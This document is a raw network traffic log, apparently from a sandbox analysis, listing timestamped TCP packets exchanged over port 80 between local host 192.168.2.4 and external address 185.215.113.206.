Dec 10, 2024 00:42:06.092751980 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.092816114 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.183897972 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.183996916 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.184045076 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.184079885 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.188050032 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.188122034 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.188160896 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.188188076 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.196374893 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.196479082 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.196543932 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.196588993 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.204761982 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.204821110 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.204833984 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.204919100 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.213089943 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.213277102 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.246366978 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.246428013 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.246442080 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.246489048 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.250545025 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.250623941 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.250648022 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.250719070 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.258877993 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.258938074 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.261904001 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.261957884 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.262047052 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.262104034 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.270277023 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.270354033 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.270391941 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.270436049 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.278691053 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.278755903 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.278763056 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.278804064 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.287003994 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.287097931 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.287111998 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.287159920 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.295340061 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.295406103 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.313328981 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.313384056 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.313421965 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.313465118 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.317388058 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.317455053 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.317481041 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.317522049 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.325579882 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.325622082 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.325660944 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.325700045 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.331779957 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.331830978 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.331871033 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.331914902 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.339768887 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.339819908 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.339824915 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.339864016 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.375853062 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.375865936 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.375929117 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.378006935 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.378053904 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.378104925 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.378142118 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.385384083 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.385437012 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.385476112 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.385514975 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.392782927 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.392857075 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.392879009 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.392919064 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.400218010 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.400273085 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.400402069 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.400432110 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.407565117 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.407696962 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.407728910 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.407764912 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.414433002 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.414484024 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.414500952 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.414519072 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.421324015 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.421385050 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.421425104 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.421474934 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.428198099 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.428251982 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.428253889 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.428291082 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.434477091 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.434525013 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.438571930 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.438627005 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.438662052 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.438725948 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.440502882 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.440548897 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.440597057 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.440644026 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.444433928 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.444483995 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.444521904 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.444570065 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.448365927 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.448417902 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.448487997 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.448539019 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.452308893 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.452379942 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.452433109 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.452471972 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.456265926 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.456322908 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.456350088 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.456394911 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.460093975 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.460150003 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.460212946 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.460263014 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.463747978 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.463804960 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.463865042 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.463916063 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.467401028 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.467459917 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.467502117 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.467549086 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.471044064 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.471091032 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.471128941 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.471182108 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.474668026 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.474735975 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.505343914 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.505403042 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.505450010 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.505495071 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.507184029 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.507236004 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.507287979 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.507332087 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.510807037 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.510857105 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.512109995 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.512182951 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.512212038 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.512260914 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.515762091 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.515824080 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.515898943 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.515947104 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.519403934 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.519473076 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.519505978 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.519552946 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.523020983 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.523082972 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.523086071 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.523129940 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.568825960 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.568900108 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.568993092 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.569045067 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.570207119 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.570271015 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.570312023 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.570359945 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.572962046 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.573018074 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.573198080 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.575719118 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.575788975 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.575819969 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.575866938 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.578547955 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.578573942 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.578594923 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.578632116 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.581305027 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.581363916 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.581392050 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.581433058 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.583818913 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.583880901 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.583909988 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.583951950 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.586436987 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.586513042 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.586539984 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.586580992 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.588998079 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.589056015 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.589056969 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.589095116 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.591496944 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.591547012 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.591711044 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.591758966 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.594007015 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.594098091 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.594119072 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.594172955 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.596436024 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.596493959 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.596549988 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.596596956 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.598786116 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.598846912 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.598879099 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.598922968 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.601249933 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.601300001 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.601320028 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.601358891 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.603502989 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.603549004 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.603640079 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.603683949 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.605854034 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.605916977 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.605983973 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.606028080 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.630625963 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.630739927 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.630739927 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.630786896 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.631752014 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.631799936 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.631869078 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.631916046 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.634006023 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.634057045 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.634183884 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.634228945 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.636282921 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.636333942 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.636394978 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.636440992 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.638457060 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.638523102 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.638576031 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.638623953 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.640425920 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.640502930 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.640535116 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.640582085 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.642477989 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.642527103 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.642581940 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.642623901 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.644539118 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.644581079 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.644661903 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.644701004 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.646615028 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.646667004 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.646878958 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.646925926 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.648560047 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.648631096 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.648662090 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.648708105 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.650599003 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.650651932 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.650712967 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.650755882 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.652590990 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.652638912 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.652719021 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.652761936 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.654618025 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.654670000 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.654800892 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.654844046 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.656660080 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.656702995 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.656711102 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.656745911 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.658729076 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.658765078 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.658798933 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.658827066 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.660651922 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.660703897 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.660757065 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.660799980 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.662650108 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.662698984 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.662741899 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.662789106 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.664706945 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.664761066 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.664834976 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.664876938 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.666733027 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.666785002 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.666812897 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.666853905 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.668688059 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.668730974 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.668838024 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.668883085 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.670741081 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.670764923 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.670789957 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.670814037 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.697541952 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.697701931 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.697705984 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.697748899 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.698558092 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.698606968 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.698673010 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.698718071 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.700640917 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.700712919 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.700757980 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.700803041 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.702610016 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.702661037 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.702837944 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.702877998 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.704632998 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.704679012 CET	49730	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:06.704797029 CET	80	49730	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:06.704840899 CET	49730	80	192.168.2.4	185.215.113.206
